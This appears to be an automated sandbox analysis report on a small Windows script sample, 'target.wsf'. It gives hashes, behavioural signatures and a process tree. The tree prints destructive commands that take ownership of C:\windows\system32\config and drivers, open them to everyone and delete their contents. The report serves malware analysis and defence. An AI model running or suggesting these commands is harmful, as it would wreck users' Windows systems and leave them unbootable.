Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-08-2024 21:37
Static task
static1
Behavioral task
behavioral1
Sample
target.wsf
Resource
win7-20240704-en
General
-
Target
target.wsf
-
Size
2KB
-
MD5
6425a144c5de5bc3bcd5865809150a0d
-
SHA1
257d00e71e71832c90fc494b5121df3a8149560d
-
SHA256
7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
-
SHA512
95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exepid process 3476 icacls.exe 4072 takeown.exe 3152 takeown.exe 5112 icacls.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation WScript.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 4072 takeown.exe 3152 takeown.exe 5112 icacls.exe 3476 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings cmd.exe -
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
Notepad.exeNotepad.exepid process 2912 Notepad.exe 2328 Notepad.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 4072 takeown.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 3216 wrote to memory of 3292 3216 cmd.exe WScript.exe PID 3216 wrote to memory of 3292 3216 cmd.exe WScript.exe PID 3292 wrote to memory of 3820 3292 WScript.exe cmd.exe PID 3292 wrote to memory of 3820 3292 WScript.exe cmd.exe PID 3292 wrote to memory of 2624 3292 WScript.exe cmd.exe PID 3292 wrote to memory of 2624 3292 WScript.exe cmd.exe PID 2624 wrote to memory of 4072 2624 cmd.exe takeown.exe PID 2624 wrote to memory of 4072 2624 cmd.exe takeown.exe PID 3820 wrote to memory of 3152 3820 cmd.exe takeown.exe PID 3820 wrote to memory of 3152 3820 cmd.exe takeown.exe PID 3820 wrote to memory of 5112 3820 cmd.exe icacls.exe PID 3820 wrote to memory of 5112 3820 cmd.exe icacls.exe PID 2624 wrote to memory of 3476 2624 cmd.exe icacls.exe PID 2624 wrote to memory of 3476 2624 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3152
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3476
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2940
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\target.wsf1⤵
- Opens file in notepad (likely ransom note)
PID:2912
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf"1⤵PID:4560
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\thescript.vbs1⤵
- Opens file in notepad (likely ransom note)
PID:2328
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ConfirmResize.vbs"1⤵PID:4300
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD57efc82c24c2ce07d6e37f750cc9aa312
SHA124641d0653f3b3b850b25319bdae26bf1a46040a
SHA25678d136408cfd4790b861a67f1a7acb826c7c7e8ee75aa7fa5b60ae6e33216d4f
SHA512a1a3ee6fa3bfede92806362447b787a29b3ad1e9f64322eec4c8ef38e7a3742eef843373da1461512bc7ee83953344ff67fff2c46eb57fc2feca9e632847edde
-
Filesize
2KB
MD56425a144c5de5bc3bcd5865809150a0d
SHA1257d00e71e71832c90fc494b5121df3a8149560d
SHA2567c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
SHA51295dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34
-
Filesize
78B
MD5ece02545122cc48c9d8afaf3f94dd04f
SHA18e07b6da685faad07f8413230a95ce0ae8987e0d
SHA2565098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d